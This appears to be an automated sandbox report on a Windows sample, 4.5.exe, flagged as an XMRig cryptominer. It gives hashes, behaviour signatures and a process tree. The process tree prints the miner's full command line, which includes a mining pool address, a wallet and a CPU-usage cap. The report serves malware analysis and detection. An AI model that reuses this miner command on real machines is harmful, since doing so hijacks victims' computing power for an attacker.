Analysis

  • max time kernel
    36s
  • max time network
    127s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    07-05-2021 13:04

General

  • Target

    4.5.exe

  • Size

    12KB

  • MD5

    e00c93a8d92089c7c76fbe9494756767

  • SHA1

    e019b100708504bb10225d3e5ab217a4c6e6a07b

  • SHA256

    67c1bf436244ca2a7be46383189af959086e7f77f6b325f99a0960d745348b10

  • SHA512

    d216ae9fa7410ed523dbdd99188ed045edda03ba314ca9852b1b660838043661db65507fb4121dc0962f4dd7bd1ef5a535396b31114dfc446269f626286c235d

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Downloads MZ/PE file
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4.5.exe
    "C:\Users\Admin\AppData\Local\Temp\4.5.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1824
    • C:\Users\Admin\AppData\Local\Temp\4.5.exe
      C:\Users\Admin\AppData\Local\Temp\4.5.exe --background --donate-level 1 --nicehash --keepalive -o 185.81.157.186:8080 -u 443PHqLKctFXBXHe4WJfPh9XcLF3YinfzJkNAet7o9pm37YzTUJokPSDvbf2bBgzFUcYWeBVGpYkpjNm8N1ZzRTf7SMUz9F--max-cpu-usage=90
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3008

Network

MITRE ATT&CK Matrix ATT&CK v6

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1824-114-0x00000241B4B20000-0x00000241B4B21000-memory.dmp
    Filesize

    4KB

  • memory/1824-116-0x00000241B4E40000-0x00000241B4E42000-memory.dmp
    Filesize

    8KB

  • memory/3008-118-0x000000014016BD98-mapping.dmp
  • memory/3008-117-0x0000000140000000-0x0000000140598000-memory.dmp
    Filesize

    5.6MB

  • memory/3008-119-0x000001B22B830000-0x000001B22B844000-memory.dmp
    Filesize

    80KB

  • memory/3008-120-0x0000000140000000-0x0000000140598000-memory.dmp
    Filesize

    5.6MB

  • memory/3008-121-0x000001B22D1E0000-0x000001B22D200000-memory.dmp
    Filesize

    128KB

  • memory/3008-122-0x000001B22D200000-0x000001B22D220000-memory.dmp
    Filesize

    128KB

  • memory/3008-123-0x000001B22D220000-0x000001B22D240000-memory.dmp
    Filesize

    128KB